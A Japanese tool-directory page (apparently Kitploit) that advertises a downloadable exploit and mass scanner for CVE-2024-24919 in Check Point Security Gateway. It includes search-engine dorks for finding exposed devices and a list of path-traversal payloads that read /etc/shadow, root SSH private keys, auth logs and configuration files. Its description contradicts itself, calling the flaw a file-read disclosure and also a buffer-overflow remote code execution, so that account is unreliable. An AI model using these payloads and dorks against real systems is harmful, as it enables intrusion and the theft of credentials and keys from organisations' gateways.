Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-24919 — CVE-2024-24919 エクスプロイト | Kitploit
ツール/GitHubGitHub/goatsecurity/cve-2024-24919
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubgoatsecurity/cve-2024-24919

CVE-2024-24919

CVE-2024-24919 エクスプロイト

リポジトリを見る
20112年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Check Point Security Gateway RCEエクスプロイトツール (CVE-2024-24919)

概要

このリポジトリには、Check Point Security GatewayのCVE-2024-24919脆弱性を悪用するためのツールが含まれています。このツールは、脆弱なデバイスを識別できるマルチスキャナーと、影響を受けるデバイスを完全に制御できる単一ターゲットエクスプロイトです。

CVE-2024-24919は、攻撃者がCheck Point Security Gateway上の任意のファイルをリモートで読み取ることを可能にする、重大度の高い情報漏えい脆弱性です。この脆弱性は、パスワードや設定ファイルなどの機密情報を盗むために悪用される可能性があります。

免責事項:

このツールは教育目的のみで提供されています。所有者の明示的な同意なしに、脆弱なシステムを攻撃するために使用してはなりません。このツールの作者は、その使用によって生じたいかなる損害についても責任を負いません。

仕組み

このエクスプロイトは、特別に細工されたHTTPリクエストを脆弱なデバイスに送信することで動作します。このリクエストはデバイスのファームウェアにバッファオーバーフローを引き起こし、攻撃者が任意のコードを実行できるようにします。その後、このエクスプロイトを使用してデバイスの完全な制御を取得できます。

要件

  • Python 3
  • colorama
  • requests

インストール

root@kitploit:~
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt

使用方法

単一ターゲットまたは複数ターゲットをスキャンできます!

root@kitploit:~
python cve-2024-24919.py

**Dorks **

root@kitploit:~
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"

# Shodan
SHODAN: http.title="Check Point SSL Network Extender"

# Fofa Query
FOFA: title="Check Point SSL Network Extender"

** ツールのスクリーンショット **

ss

$ ツールのパス : ```

root@kitploit:~
    'aCSHELL/../../../../../../../../../../../etc/passwd',
    
    'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
    
    'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
    
    'aCSHELL/../../../../../../../../../../../var/log/syslog',
    
    'aCSHELL/../../../../../../../../../../../var/log/auth.log',
    
    #'aCSHELL/../../../../../../../../../../../var/log/messages',
    
    'aCSHELL/../../../../../../../../../../../etc/group',
    
    'aCSHELL/../../../../../../../../../../../etc/shadow',
    
    'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
    
    'aCSHELL/../../../../../../../../../../../etc/hostname',
    
    'aCSHELL/../../../../../../../../../../../etc/hosts',
    
    'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```
ツールをダウンロード